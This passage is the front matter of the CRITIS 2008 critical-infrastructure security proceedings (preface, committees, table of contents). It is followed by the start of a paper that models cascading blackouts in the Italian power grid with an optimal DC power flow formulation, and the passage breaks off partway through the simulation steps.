Lecture Notes in Computer Science Commenced Publication in 1973 Founding and Former Series Editors: Gerhard Goos, Juris Hartmanis, and Jan van Leeuwen
Editorial Board
David Hutchison, Lancaster University, UK
Takeo Kanade, Carnegie Mellon University, Pittsburgh, PA, USA
Josef Kittler, University of Surrey, Guildford, UK
Jon M. Kleinberg, Cornell University, Ithaca, NY, USA
Alfred Kobsa, University of California, Irvine, CA, USA
Friedemann Mattern, ETH Zurich, Switzerland
John C. Mitchell, Stanford University, CA, USA
Moni Naor, Weizmann Institute of Science, Rehovot, Israel
Oscar Nierstrasz, University of Bern, Switzerland
C. Pandu Rangan, Indian Institute of Technology, Madras, India
Bernhard Steffen, University of Dortmund, Germany
Madhu Sudan, Microsoft Research, Cambridge, MA, USA
Demetri Terzopoulos, University of California, Los Angeles, CA, USA
Doug Tygar, University of California, Berkeley, CA, USA
Gerhard Weikum, Max-Planck Institute of Computer Science, Saarbruecken, Germany
5508
Roberto Setola Stefan Geretshuber (Eds.)
Critical Information Infrastructures Security
Third International Workshop, CRITIS 2008
Rome, Italy, October 13-15, 2008
Revised Papers
Volume Editors

Roberto Setola
Complex System and Security Lab - University CAMPUS Bio-Medico of Rome
Via A. del Portillo, 21, 00128 Rome, Italy
E-mail: [email protected]

Stefan Geretshuber
IABG mbH Germany, InfoCom, Safety and Security, Dept. for Critical Infrastructures
Einsteinstr. 20, 85521 Ottobrunn, Germany
E-mail: [email protected]

Library of Congress Control Number: 2009934295
CR Subject Classification (1998): C.2, D.4.6, J.2, B.4.5, K.4.1, K.4.4
LNCS Sublibrary: SL 4 – Security and Cryptology
ISSN 0302-9743
ISBN-10 3-642-03551-5 Springer Berlin Heidelberg New York
ISBN-13 978-3-642-03551-7 Springer Berlin Heidelberg New York
This work is subject to copyright. All rights are reserved, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, re-use of illustrations, recitation, broadcasting, reproduction on microfilms or in any other way, and storage in data banks. Duplication of this publication or parts thereof is permitted only under the provisions of the German Copyright Law of September 9, 1965, in its current version, and permission for use must always be obtained from Springer. Violations are liable to prosecution under the German Copyright Law. springer.com © Springer-Verlag Berlin Heidelberg 2009 Printed in Germany Typesetting: Camera-ready by author, data conversion by Scientific Publishing Services, Chennai, India Printed on acid-free paper SPIN: 12726011 06/3180 543210
Preface
This volume contains the proceedings of the Third International Workshop on Critical Information Infrastructure Security (CRITIS 2008), which was held October 13–15, 2008 in Villa Mondragone (Rome), Italy, and was co-organized by AIIC (the Italian Society of Critical Infrastructures Experts) and ENEA (the Italian National Agency for New Technology, Energy and the Environment).

This year's workshop focused on an interdisciplinary and multifaceted dialogue about third-millennium security strategies for critical information infrastructures (CII) and their protection (CIP). The aim was to explore the new challenges posed by CII, bringing together researchers and professionals from universities, private companies and public administrations interested in all security-related aspects and actively involved in the scientific communities at the national, European and trans-European level.

More than 70 papers were submitted to the conference and were screened by a very selective double-blind review process to identify the 39 papers selected for presentation, based on their significance, novelty and technical quality. Revisions were not checked and the authors bear full responsibility for the content of their papers. CRITIS 2008 also had six outstanding invited speakers: Erol Gelenbe (Imperial College, UK), Massoud Amin (University of Minnesota, USA), George Apostolakis (MIT, USA), Andrea Valboni (Microsoft, Italy), Sujeet Shenoi (University of Tulsa, USA) and Angelo Marino (DG Information Society and Media, European Commission).

All the contributions highlight current developments in the field of critical (information) infrastructures and their protection. Specifically, they emphasize that the efforts dedicated to this topic are beginning to provide some concrete results. Indeed, the main focus has moved from the problem definition toward its formalization, qualification and solution. Some papers illustrated interesting and innovative approaches devoted to understanding, analyzing and modeling scenarios composed of several heterogeneous and interdependent infrastructures. Interesting results were related to the vulnerability and risk assessment of the different components of critical infrastructures, and more specifically to those of the cyber layer. Furthermore, issues concerning crisis management scenarios for interdependent infrastructures were illustrated. Encouraging preliminary results were presented on the development of new technological solutions addressing self-healing capabilities of infrastructures, regarded as one of the most promising research topics for improving the resilience of infrastructures.

The relevance assumed by the CRITIS conferences was confirmed by the support given by the IEEE and IFIP communities active in CIP, by the patronage offered by the Italian Prime Minister Office and the JRC of the European Commission, as well as by the sponsorship provided by Telecom Italia, Microsoft, Theorematica,
Siemens, IABG, D'Appolonia, and IAS Fraunhofer, to whom we are greatly indebted.

Many people contributed to the successful organization of the conference and we are very much obliged to all of them. Among others we need to thank the General Co-chairs, Sandro Bologna and Stefanos Gritzalis, and the Conference Honorary Chair, Salvatore Tucci. We sincerely thank them for their excellent support, encouragement and help in all organizational issues. Our special thanks also go to Emiliano Casalicchio for managing all the organizational and logistical issues as Local Organization Chair, to Stefano Panzieri for the preparation and maintenance of the workshop website, and to all the other people who worked together organizing the conference. CRITIS 2008 thanks the members of the Program Committee and the external reviewers, who performed an excellent job during the review process, which is the essence of the quality of the event, and, last but not least, the authors who submitted papers as well as the participants from all over the world who chose to honor us with their attendance.

April 2009
Roberto Setola
Stefan Geretshuber
CRITIS 2008
Third International Workshop on Critical Information Infrastructure Security
Villa Mondragone, Monte Porzio Catone, Rome, October 13–15, 2008

Organized by
AIIC – Associazione Italiana Infrastrutture Critiche
ENEA – Ente per le Nuove tecnologie, l'Energia e l'Ambiente
Program Co-chairs
Roberto Setola, Università CAMPUS Bio-Medico, Italy
Stefan Geretshuber, IABG, Germany

General Co-chairs
Sandro Bologna, ENEA, Italy
Stefanos Gritzalis, University of the Aegean, Greece

Honorary Chair
Salvatore Tucci, Italian Prime Minister Office, Università Roma Tor Vergata, AIIC, Italy

Sponsorship Co-chairs
Salvatore D'Antonio, CINI, Italy
Marcelo Masera, IPSC, Joint Research Centre, Italy
Stefano Panzieri, Università di Roma Tre, Italy

Local Organization Chair
Emiliano Casalicchio, Università di Roma Tor Vergata, Italy
International Program Committee
George Apostolakis, MIT, USA
Fabrizio Baiardi, Università di Pisa, Italy
Robin Bloomfield, City University, UK
Stefan Brem, Federal Office for Civil Protection, Switzerland
Donald D. Dudenhoeffer, INL, USA
Myriam Dunn, ETH Center for Security Studies Zurich, Switzerland
Claudia Eckert, Fraunhofer SIT, Germany
Urs E. Gattiker, CyTRAP Labs, Switzerland
Erol Gelenbe, Imperial College London, UK
Adrian Gheorghe, Old Dominion University, USA
Eric Goetz, Dartmouth College, USA
Nouredine Hadjsaid, L.E.G., Grenoble Institute of Technology, France
Bernhard M. Hämmerli, Acris GmbH & Univ. Applied Sciences Lucerne, Switzerland
Chris Johnson, Glasgow University, UK
Raija Koivisto, VTT, Finland
Rüdiger Klein, Fraunhofer IAIS, Germany
Javier Lopez, University of Malaga, Spain
Eric Luiijf, TNO Defence, Security and Safety, The Netherlands
Angelo Marino, European Commission
Simin Nadjm-Tehrani, Linköping University, Sweden and Univ. of Luxembourg
Eiji Okamoto, University of Tsukuba, Japan
Andrew Powell, CPNI, UK
Kai Rannenberg, Goethe University Frankfurt, Germany
Michel Riguidel, ENST, France
Erich Rome, Fraunhofer IAIS, Germany
William H. Sanders, University of Illinois, USA
Sujeet Shenoi, University of Tulsa, USA
Neeraj Suri, TU Darmstadt, Germany
Giovanni Ulivi, DIA – Università di Roma Tre, Italy
Paulo Veríssimo, Universidade de Lisboa, Portugal
Stephen D. Wolthusen, Royal Holloway, University of London, UK
Stefan Wrobel, University of Bonn and Fraunhofer IAIS, Germany
Jianying Zhou, Institute for Infocomm Research, Singapore
Organizing Committee
Susanna Del Bufalo, ENEA, Italy
Stefano De Porcellinis, Università CAMPUS Bio-Medico, Italy
Annamaria Fagioli, ENEA, Italy
Emanuele Galli, Università di Roma Tor Vergata, Italy
Bernardo Palazzi, Università di Roma Tre, Italy
Federica Pascucci, Università di Roma Tre, Italy
Elena Spadini, Università CAMPUS Bio-Medico, Italy
Steering Committee Chairs
Bernhard M. Hämmerli, Acris GmbH and University of Applied Sciences Lucerne, Switzerland
Javier Lopez, University of Malaga, Spain

Members
Sokratis Katsikas, University of the Aegean, Greece
Reinhard Posch, Technical University Graz, Austria
Saifur Rahman, Advanced Research Institute, Virginia Tech, USA

External Reviewers
Salvatore D'Antonio, Vincenzo Fioriti, Andrea Rigoni, Reinhard Hutter, Sandro Meloni, Marco Carbonelli, Laura Gratta, Roberto Obialero, Giovanni Pellerino, Ugo Marturano, Ilaria Scarano, Claudio Calisti
Table of Contents
Blackouts in Power Transmission Networks Due to Spatially Localized Load Anomalies .......... 1
Carla Dionisi, Francesca Mariani, Maria Cristina Recchioni, and Francesco Zirilli

Stability of a Distributed Generation Network Using the Kuramoto Models .......... 14
Vincenzo Fioriti, Silvia Ruzzante, Elisa Castorini, Elena Marchei, and Vittorio Rosato

Enabling System of Systems Analysis of Critical Infrastructure Behaviors .......... 24
William J. Tolone, E. Wray Johnson, Seok-Won Lee, Wei-Ning Xiang, Lydia Marsh, Cody Yeager, and Josh Blackwell

Information Modelling and Simulation in Large Interdependent Critical Infrastructures in IRRIIS .......... 36
Rüdiger Klein, Erich Rome, Césaire Beyel, Ralf Linnemann, Wolf Reinhardt, and Andrij Usov

Multi-level Dependability Modeling of Interdependencies between the Electricity and Information Infrastructures .......... 48
Marco Beccuti, Giuliana Franceschinis, Mohamed Kaâniche, and Karama Kanoun

Interdependency Analysis in Electric Power Systems .......... 60
Silvano Chiaradonna, Felicita Di Giandomenico, and Paolo Lollini

Modeling and Simulation of Complex Interdependent Systems: A Federated Agent-Based Approach .......... 72
Emiliano Casalicchio, Emanuele Galli, and Salvatore Tucci

Self-healing and Resilient Critical Infrastructures .......... 84
Rune Gustavsson and Björn Ståhl

Critical Infrastructures Security Modeling, Enforcement and Runtime Checking .......... 95
Anas Abou El Kalam and Yves Deswarte

INcreasing Security and Protection through Infrastructure REsilience: The INSPIRE Project .......... 109
Salvatore D'Antonio, Luigi Romano, Abdelmajid Khelil, and Neeraj Suri
Increase of Power System Survivability with the Decision Support Tool CRIPS Based on Network Planning and Simulation Program PSS®SINCAL .......... 119
Christine Schwaegerl, Olaf Seifert, Robert Buschmann, Hermann Dellwing, Stefan Geretshuber, and Claus Leick

Information Modelling and Simulation in Large Dependent Critical Infrastructures – An Overview on the European Integrated Project IRRIIS .......... 131
Rüdiger Klein
Assessment of Structural Vulnerability for Power Grids by Network Performance Based on Complex Networks .......... 144
Ettore Bompard, Marcelo Masera, Roberto Napoli, and Fei Xue

Using Centrality Measures to Rank the Importance of the Components of a Complex Network Infrastructure .......... 155
Francesco Cadini, Enrico Zio, and Cristina-Andreea Petrescu

RadialNet: An Interactive Network Topology Visualization Tool with Visual Auditing Support .......... 168
João P.S. Medeiros and Selan R. dos Santos

Quantitative Security Risk Assessment and Management for Railway Transportation Infrastructures .......... 180
Francesco Flammini, Andrea Gaglione, Nicola Mazzocca, and Concetta Pragliola

Assessing and Improving SCADA Security in the Dutch Drinking Water Sector .......... 190
Eric Luiijf, Manou Ali, and Annemarie Zielstra

Analysis of Malicious Traffic in Modbus/TCP Communications .......... 200
Tiago H. Kobayashi, Aguinaldo B. Batista Jr., João Paulo S. Medeiros, José Macedo F. Filho, Agostinho M. Brito Jr., and Paulo S. Motta Pires

Scada Malware, a Proof of Concept .......... 211
Andrea Carcano, Igor Nai Fovino, Marcelo Masera, and Alberto Trombetta

Testbeds for Assessing Critical Scenarios in Power Control Systems .......... 223
Giovanna Dondossola, Geert Deconinck, Fabrizio Garrone, and Hakem Beitollahi

A Structured Approach to Incident Response Management in the Oil and Gas Industry .......... 235
Maria B. Line, Eirik Albrechtsen, Martin Gilje Jaatun, Inger Anne Tøndel, Stig Ole Johnsen, Odd Helge Longva, and Irene Wærø
Security Strategy Analysis for Critical Information Infrastructures .......... 247
Jose Manuel Torres, Finn Olav Sveen, and Jose Maria Sarriegi

Emerging Information Infrastructures: Cooperation in Disasters .......... 258
Mikael Asplund, Simin Nadjm-Tehrani, and Johan Sigholm

Service Modeling Language Applied to Critical Infrastructure .......... 271
Gianmarco Baldini and Igor Nai Fovino

Graded Security Expert System .......... 279
Jüri Kivimaa, Andres Ojamaa, and Enn Tyugu

Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel .......... 287
Joan Tomàs-Buliart, Marcel Fernández, and Miguel Soriano

Adaptation of Modelling Paradigms to the CIs Interdependencies Problem .......... 295
Jose M. Sarriegi, Finn Olav Sveen, Jose M. Torres, and Jose J. Gonzalez

Empirical Findings on Critical Infrastructure Dependencies in Europe .......... 302
Eric Luiijf, Albert Nieuwenhuijs, Marieke Klaver, Michel van Eeten, and Edite Cruz

Dependent Automata for the Modelling of Dependencies .......... 311
Susanna Donatelli

Application of IPK (Information, Preferences, Knowledge) Paradigm for the Modelling of Precautionary Principle Based Decision-Making .......... 319
Adam Maria Gadomski and Tomasz Adam Zimny

Disaster Propagation in Heterogeneous Media via Markovian Agents .......... 328
Davide Cerotti, Marco Gribaudo, and Andrea Bobbio

A Study on Multiformalism Modeling of Critical Infrastructures .......... 336
Francesco Flammini, Valeria Vittorini, Nicola Mazzocca, and Concetta Pragliola

Simulation of Critical ICT Infrastructure for Municipal Crisis Management .......... 344
Adam Kozakiewicz, Anna Felkner, and Tomasz Jordan Kruk

An Ontology-Based Approach to Blind Spot Revelation in Critical Infrastructure Protection Planning .......... 352
Joshua Blackwell, William J. Tolone, Seok-Won Lee, Wei-Ning Xiang, and Lydia Marsh
Security of Water Infrastructure Systems .......... 360
Demetrios G. Eliades and Marios M. Polycarpou

Critical Infrastructures as Complex Systems: A Multi-level Protection Architecture .......... 368
Pierluigi Assogna, Glauco Bertocchi, Antonio DiCarlo, Franco Milicchio, Alberto Paoluzzi, Giorgio Scorzelli, Michele Vicentino, and Roberto Zollo

Challenges Concerning the Energy-Dependency of the Telecom Infrastructure .......... 376
Lothar Fickert, Helmut Malleck, and Christian Wakolbinger

An Effective Approach for Cascading Effects Prevision in Critical Infrastructures .......... 386
Luisa Franchina, Marco Carbonelli, Laura Gratta, Claudio Petricca, and Daniele Perucchini

Author Index .......... 395
Blackouts in Power Transmission Networks Due to Spatially Localized Load Anomalies

Carla Dionisi1, Francesca Mariani1, Maria Cristina Recchioni2, and Francesco Zirilli1

1 CERI - Centro di Ricerca "Previsione, Prevenzione e Controllo dei Rischi Geologici", Università di Roma "La Sapienza", Piazza Umberto Pilozzi 9, 00038 Valmontone (Roma), Italy
[email protected], fra−[email protected], [email protected]
2 Dipartimento di Scienze Sociali "D. Serrani", Università Politecnica delle Marche, Piazza Martelli 8, 60121 Ancona, Italy
[email protected]

Abstract. In this paper we study cascading blackouts in power transmission networks due to spatially localized load anomalies. The term "spatially localized load anomalies" means that the overloaded nodes in the graph representing the power transmission network are concentrated in a small zone of the graph. Typically these anomalies are caused by extreme weather conditions localized in some parts of the region served by the power transmission network. We generalize a mathematical formulation of the cascading blackout problem introduced in [1] and later developed in [2]. This mathematical formulation of the blackout problem when the load of the network is perturbed randomly allows the study of the probability density functions of the measure of the size of the blackout generated and of the occupation of the network lines. The analysis presented shows that spatially localized load anomalies of a given "magnitude" can generate blackouts of larger size than the blackouts generated by a load anomaly of the same magnitude distributed proportionally on the entire network. Load anomalies of this last type have been studied in [1], [2]. The previous results are obtained studying the behaviour of the Italian high voltage power transmission network through some numerical experiments.

Keywords: power transmission network, cascading blackout, stochastic optimization, mathematical programming.
It is a pleasure to thank A. Farina and A. Graziano of SELEX-Sistemi Integrati s.p.a., Roma, Italy for helpful discussions and advice during the preparation of this paper. The work of Francesca Mariani has been partially supported by SELEX Sistemi Integrati s.p.a., Roma, Italy through a research contract granted to CERI-Università di Roma "La Sapienza". The numerical experience reported in this paper has been obtained using the computing grid of ENEA (Roma, Italy). The support and sponsorship of ENEA are gratefully acknowledged.
1 Introduction
The problem of cascading failures is of great interest in the study of large complex transmission networks such as electric power networks. Cascading failures are failures occurring on a fast time scale as an effect of the reduction of the operating margins in the transmission network due to congestions or line breakdowns. The control of these cascading failures is a challenging problem since transmission networks present a high interdependence between their components. In the case of power transmission networks this interdependence is the main reason for their vulnerability: due to it, local overloads of lines or local failures of components can generate cascades of current breaks that, in extreme cases, can cause the fall of the whole network. This phenomenon is called a "cascading blackout". The meaning of the term "blackout" is simply "temporary absence of electric power in some parts of an electric network". The "cascading blackout" phenomenon has been studied in the recent scientific and technical literature using several approaches (see [2], [3] and the references therein). The analysis presented in this paper is inspired by the approach that studies the blackout dynamics considering the network behaviour in steady state conditions when random fluctuations are introduced in the load of the network. In this approach the blackout dynamics is simulated as a sequence of stationary states. An analytical model of this type is the "CASCADE" model presented in [4] and further developed in [2]. In this model the status of the network is represented through the DC power flow problem. This type of model has been used to study the behaviour of a part of the USA power transmission network in [1] (the IEEE 118 bus network [5]) and of the Italian high voltage power transmission network in [2]. Furthermore, since the blackouts generated are induced by random fluctuations of the loads of the network around prescribed mean load values, using this type of model the statistical analysis of the blackout size measure associated to load anomalies is easily performed. Similarly, the statistical analysis of the resulting line occupations is easily performed. This approach is of great practical value since it makes possible the numerical simulation of the behaviour of relevant networks at an affordable computational cost. Obviously, this simple approach provides a crude approximation of the blackout dynamics. In fact, it does not consider issues due to reactive voltages. More realistic models such as the AC model could be used (see for example [6]) and their use in blackout dynamics simulation deserves further investigation. The work presented here is based on the analysis proposed in [2] and, when compared with [2], introduces two main novelties: the first one is a nonlinear merit function and the second one is a new way of increasing the load of the network that models a spatially localized load anomaly. In [2] the merit function is a linear function, so that the optimal DC power flow problem reduces to a linear programming problem that can be solved with the simplex algorithm. Here we remove the restriction of the linearity of the merit function, considering nonlinear merit functions. However, we retain the linearity of the constraints. In particular, we consider a quadratic merit function that tries to select the configuration that minimizes the cost of the power injected by the generator nodes present in the network.
Obviously, this change in the objective function induces a change in the numerical method used to solve the optimization problem, which is now a problem with linear constraints and a quadratic objective function. The use of the nonlinear merit function and of an interior point algorithm to solve the corresponding optimization problem changes substantially the resulting optimal flow. In general, the flows determined with the model presented in this paper have a smaller power generation cost than those determined with the models used in [1], [2]. In [2], starting from a feasible optimal DC power flow problem, the power demand is increased by increasing the expected value of the power demanded by all the load nodes proportionally. This is the case to consider when we want to study the network response to the behaviour of the power demand over the years. In this paper we study the blackout dynamics when the power demand increment is concentrated in a group of load nodes that are localized in space. This is the case to consider when exceptional events, such as extreme weather conditions, hit some zone of the network. Finally, to simulate a cascading blackout we consider values of the total power demand corresponding to unfeasible optimal DC power flow problems. An optimal DC power flow problem is unfeasible when the constraints are inconsistent. An unfeasible problem is unsolvable. However, in general, depending on the objective function, a constrained optimization problem can be unsolvable even if the constraints are not inconsistent. We note that the choice of the objective function made later, see (9), implies that when the DC power flow problem is unsolvable the constraints are inconsistent. We reduce the simulation of the dynamics of cascading blackouts to the study of a sequence of optimal DC power flow problems. In fact, once established that the optimal DC power flow problem is unfeasible, following some specified rules, we simulate the blackout cascade (see Steps 1-10 in Section 2). As done in [2] we measure the size of the blackout generated as the fraction of the total power load that has been shed during the cascading blackout simulation. If all the loads are shed the measure of the corresponding blackout size is equal to one, and this means that the whole power transmission network is blacked out. Under some specified assumptions we study the probability density function of the measure of the size of the blackout generated with the previous scheme and in particular we consider the probability of generating large blackouts. We consider probability density functions of the blackout size measure for several given values of the (mean) total power demand. We say that the transmission network is in critical condition whenever these probability density functions show a tail decreasing as a power law when the blackout size measure increases. We limit our analysis to the study of the blackout size measure probability density function as a function of the power demand in the case of the Italian high voltage power transmission network (Figure 1) when the power demand increment is concentrated in a group of load nodes that are localized in space (black box in Figure 1). As a function of the power demand we investigate when this probability density function changes from being best fitted by a negative exponential function to being best fitted by an inverse power law.
Fig. 1. A graph representing a high voltage power transmission network and the box containing the overloaded load nodes
This phenomenon describes the transition of the network from noncritical to critical condition and is reminiscent of the phase transition phenomenon in statistical mechanics. The group of load nodes localized in space where the power demand increment is concentrated is such that a significant fraction (about 30%) of the total power demand is contained in it, and it is made of nodes highly interconnected among themselves and with the remaining part of the network. The blackout resulting from anomalies in the condition of a group of load nodes localized in space depends on the fraction of the total power demand subject to the anomalies and on the connectivity of the network in the region where the anomalies are concentrated and outside this region. The results presented in this paper, with the load anomalies concentrated in the region shown in Figure 1, must be regarded as an example of the "generic" behaviour of the network. This analysis shows that the overload of a group of nodes localized in space generates critical situations for the network for a mean total power demand smaller than the mean total power demand necessary to generate critical situations when the overload is distributed proportionally over all the load nodes. Moreover, for the localized overload considered in this paper we see that the probability density function of the blackout size measure when the power demand increases has some large flat regions (Figure 2). Finally, we study the line occupations of the Italian high voltage power transmission network analyzing the mean values of the occupation of the lines when the loads fluctuate randomly as said above. The occupation of a line is the fraction of its capacity that is occupied by the power flowing on it. Our analysis shows that, due to the presence of the quadratic merit function, the lines connected to generator nodes producing low cost power and/or contained in the region where the load anomaly is concentrated are heavily occupied. The numerical work needed to perform the study of the Italian high voltage power transmission network described above has been carried out using a Fortran code that runs on the ENEA computing grid. The ENEA grid is an infrastructure for multiplatform, parallel and distributed computing made of approximately 4000 processors located in 6 research centers around Italy [7].
The computation that has been done is very well suited for distributed computing and exploits deeply the power of the computing grid. In Section 2 we recall the mathematical model used to study the power transmission network and the cascading blackout dynamics, we define the line occupation and we explain how the load anomalies are generated. In Section 3 we use the model introduced in Section 2 to study the probability density function of the blackout size measure and the corresponding mean value of the occupations of the lines of the Italian high voltage power transmission network when a specified group of nodes is overloaded.
2 The Optimal DC Power Flow Model and the Simulation of the Blackout Dynamics
Let us define the optimal DC power flow problem studied (see [1] and [2] for further details). We begin by describing the undirected graph representing the transmission network (Figure 1). The graph is made of nodes and branches. The nodes of the graph are divided into generator nodes (triangles), load nodes (circles), and junction nodes (diamonds). The branches of the graph are the network transmission lines where the electric power flows. We associate to each line (branch) its characteristic admittance. When in a real power transmission network multiple lines connect two nodes, we substitute these lines with a unique line with admittance equal to the sum of the admittances of the multiple lines. We denote with $k = 1, 2, \ldots, N$ the $N$ nodes of the graph representing the power transmission network ($N \geq 1$); for $k, m = 1, 2, \ldots, N$ we denote with $(k, m)$ the branch connecting the nodes $k$ and $m$, and with $y_{k,m}$, $g_{k,m}$, $b_{k,m}$, respectively, the values of the admittance, of the conductance and of the susceptance of the line $(k, m)$. We remind that $y_{k,m} = g_{k,m} + \iota b_{k,m}$, $k, m = 1, 2, \ldots, N$, where $\iota$ denotes the imaginary unit. When two nodes $k$, $m$ are not connected by a line we associate to the branch $(k, m)$ zero admittance; this implies that the power flowing in the branch will be zero. Let $|\cdot|$ be the absolute value of the complex number $\cdot$; we denote with $S_k$ the total complex power injection at node $k$, with $P_k$ and $Q_k$ its real (active power) and imaginary (reactive power) parts (i.e.: $S_k = P_k + \iota Q_k$), $k = 1, 2, \ldots, N$, and with $S = (S_1, S_2, \ldots, S_N)$ the power vector. We note that $P_k$ and $Q_k$ are measured in MW (Megawatt) and that they can be expressed as differences of nonnegative quantities, that is $P_k = P_k^G - P_k^L$ and $Q_k = Q_k^G - Q_k^L$, where $P_k^G$, $P_k^L$ denote, respectively, the real power generated and the real power demanded by the node $k$, and $Q_k^G$, $Q_k^L$ denote, respectively, the reactive power generated and the reactive power demanded by the node $k$, $k = 1, 2, \ldots, N$. Moreover, for $k = 1, 2, \ldots, N$ let $S_k^G = P_k^G + \iota Q_k^G$ be the total complex power injection at node $k$ and $S_k^L = P_k^L + \iota Q_k^L$ be the total power load withdrawn at node $k$. Moreover, for $k = 1, 2, \ldots, N$, if the node $k$ is a load or a junction node we have $|S_k^G| = 0$; on the other hand a generator node $k$ may have nonzero complex power load $S_k^L$. In fact, this nonzero power demanded by the generator node
may be needed to guarantee the functioning of the generator node. With $F_{k,m}$ we denote the power flowing through the line $(k, m)$, $k, m = 1, 2, \ldots, N$. The quantity $F_{k,m}$, $k, m = 1, 2, \ldots, N$, is a complex quantity measured in kVA (kilo Volt Ampère). For $k = 1, 2, \ldots, N$ let $V_k = |V_k|(\cos\theta_k + \iota\sin\theta_k)$ be the complex voltage at node $k$, with absolute value $|V_k|$ measured in kV (kilo Volt) and phase $\theta_k$ measured in radians. We remind that in [2] we have chosen the voltage vector $|V| = (|V_1|, |V_2|, \ldots, |V_N|) = (1, 1, \ldots, 1)$. We keep this choice here. Under suitable assumptions (see [2] and the references therein for further details) a linearization of the balance power law holds, that is we have:

$$P_k = P_k^G - P_k^L = \sum_{m=1, m \neq k}^{N} -b_{k,m}\delta_{k,m}, \quad k = 1, 2, \ldots, N, \qquad (1)$$

$$Q_k = 0, \quad k = 1, 2, \ldots, N, \qquad (2)$$

where $\delta_{k,m} = \theta_k - \theta_m$, $k, m = 1, 2, \ldots, N$. In this formulation the base power $S_0$ and the base voltage $V_0$ are chosen equal to 1, so that the equations (1) are dimensionless p.u. (per unit) equations (see [2] and the references therein).

Let us state the DC (Direct Current) power flow problem: Given the load power demand vector $P^L = (P_1^L, P_2^L, \ldots, P_N^L)$, the voltage magnitude vector $|V| = (|V_1|, |V_2|, \ldots, |V_N|) = (1, 1, \ldots, 1)$, the vector of upper real power limits of the nodes $\overline{P}^G = (\overline{P}_1^G, \overline{P}_2^G, \ldots, \overline{P}_N^G)$, the upper power flow limit $\overline{F}_{k,m}$ of the power flowing along the line $(k, m)$, and the values of the susceptance $b_{k,m}$ of the line $(k, m)$, $k, m = 1, 2, \ldots, N$, find the generator real power vector $P^G = (P_1^G, P_2^G, \ldots, P_N^G)$ and the voltage angle vector $\theta = (\theta_1, \theta_2, \ldots, \theta_N)$ satisfying (1). Note that in general, given $P^L$, $\overline{P}^G$, $\overline{F}_{k,m}$ and $b_{k,m}$, $k, m = 1, 2, \ldots, N$, the DC power flow equations (1) have several solutions, so that it is a natural idea to introduce a merit function that will be minimized to choose one among these solutions. That is, the following optimization problem is formulated:

$$\min \Phi(P_1^G, P_2^G, \ldots, P_N^G), \qquad (3)$$

subject to:

$$P_k^G - P_k^L = \sum_{m=1, m \neq k}^{N} F_{k,m}, \quad k = 1, 2, \ldots, N, \qquad (4)$$

$$F_{k,m} = -b_{k,m}(\theta_k - \theta_m), \quad k, m = 1, 2, \ldots, N, \qquad (5)$$

$$|F_{k,m}| \leq \overline{F}_{k,m}, \quad k, m = 1, 2, \ldots, N, \qquad (6)$$

$$0 \leq P_k^G \leq \overline{P}_k^G, \quad k = 1, 2, \ldots, N, \qquad (7)$$

$$\theta_1 = 0, \qquad (8)$$
where the merit function $\Phi$ is given by:

$$\Phi(P_1^G, P_2^G, \ldots, P_N^G) = \sum_{k=1}^{N} c_k (P_k^G)^2 - W \sum_{k=1}^{N} (P_k^L)^2, \qquad (9)$$
where $W$ is a real positive constant representing a cost associated to the load nodes, that we choose equal to 100 (as suggested in [4]), and $c_k$ is a positive constant associated to the cost of generating power at the node $k$, $k = 1, 2, \ldots, N$. Recall that in the present formulation of the problem the quantities $P_k^L$, $k = 1, 2, \ldots, N$, are given. Equation (8) is a normalization condition. Finally, we denote with $P_D = \sum_{k=1}^{N} P_k^L$ the total power demand and with $P_C = \sum_{k=1}^{N} \overline{P}_k^G$ the total power capacity of the network.

We consider the blackout dynamics generated by load anomalies concentrated in a group of nodes that are spatially localized in a zone of the graph, when the values of the remaining parameters are unchanged. We study this effect as a function of the total power demand $P_D$, looking at increasing values of $P_D$.

Let us define the blackout size measure. Let $\tilde{A}$ be the subset of $\{1, 2, \ldots, N\}$ that contains the indices corresponding to the loads shed as a consequence of the blackout cascade, and let $P_S = \sum_{k \in \tilde{A}} P_k^L$; that is, $P_S$ is the disconnected power load. We define the blackout size measure as the ratio $P_S/P_D$ and we have: $0 \leq P_S/P_D \leq 1$. The maximum blackout size measure is $P_S/P_D = 1$, which corresponds to a total blackout; that is, when we have $P_S/P_D = 1$ all the loads are shed. Finally, for $k, m = 1, 2, \ldots, N$, when $\overline{F}_{k,m} > 0$ we define the occupation of the line $(k, m)$ as the value $O_{k,m} = F_{k,m}/\overline{F}_{k,m}$; when $\overline{F}_{k,m} = 0$ the occupation of the line $(k, m)$ is not considered, in fact in this case the branch $(k, m)$ of the graph does not represent a real transmission line of the network (there is no power flowing on the branch $(k, m)$).

The numerical scheme used to study the blackout phenomenon is a very simple scheme that tries to reproduce a sequence of events able to generate a blackout. The fact that the DC optimal power flow model describes a stationary situation (independent of time), together with the time dependent character of the blackout phenomenon, forces us to consider a sequence of DC optimal power flow problems. This sequence of problems is built with the numerical scheme that follows. This scheme is only one choice among many other schemes implementing the same ideas in a different way. The quantitative results on the blackout phenomenon obtained depend on the scheme adopted, but the broad picture of the phase transition phenomenon is substantially independent of the scheme adopted. The numerical scheme used to simulate the blackout cascade when some prespecified loads are overloaded is described in the following steps:

Step 1: initialize the load power demand vector $P^{0,L} = (P_1^{0,L}, P_2^{0,L}, \ldots, P_N^{0,L})$ with $P^L$, the voltage magnitude vector $|V|$, the upper real power limit vector $\overline{P}^G$, the upper power flow limit values $\overline{F}_{k,m}$, and the susceptance values $b_{k,m}$, $k, m = 1, 2, \ldots, N$, with the given data; assign the set $J_L$ containing the indices of the load nodes where the mean load increment is concentrated, the parameter $\alpha \geq 0$ that will be used to increment the loads, and the number $N_E$ of simulations to be performed; set $n = 0$;

Step 2: for $k = 1, 2, \ldots, N$, set $P_k^L \leftarrow P_k^{0,L}$, $k \notin J_L$, $P_k^L \leftarrow P_k^{0,L}(1 + \alpha)$, $k \in J_L$, and $P_D = \sum_{k=1}^{N} P_k^L$;
Step 3: set $n \leftarrow n + 1$. If $n > N_E$ stop, otherwise generate the random numbers $\gamma_k^n$, $k = 1, 2, \ldots, N$, independent and uniformly distributed in $[0, 1]$, and set $P_k^L \leftarrow 2 \times \gamma_k^n \times P_k^L$, $k = 1, 2, \ldots, N$;

Step 4: set $P_S = 0$;

Step 5: consider the optimal DC power flow problem (3)-(8). If problem (3)-(8) is feasible, go to Step 6, otherwise go to Step 7;

Step 6: solve problem (3)-(8), compute the corresponding blackout size measure $P_S/P_D$ and the line occupations, and go to Step 10;

